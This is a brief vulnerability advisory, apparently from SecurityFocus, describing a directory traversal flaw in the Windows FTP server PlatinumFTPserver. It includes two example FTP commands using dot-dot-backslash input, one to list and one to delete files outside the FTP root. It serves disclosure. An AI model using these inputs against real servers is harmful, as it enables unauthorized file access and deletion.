13 lines
No EOL
552 B
Text
13 lines
No EOL
552 B
Text
source: http://www.securityfocus.com/bid/6554/info
|
|
|
|
PlatinumFTPserver is an FTP server for Microsoft Windows systems. It is commercially available, and distributed by PlatinumFTP.
|
|
|
|
A directory traversal vulnerability has been reported in PlatinumFTPserver. The program does not sufficiently handle dot-dot-slash input, which could result in an attacker gaining access to unauthorized resources.
|
|
|
|
dir ..\directory
|
|
|
|
where directory represents a directory outside the FTP root.
|
|
|
|
del ..\file
|
|
|
|
where file represents a file outside the FTP root. |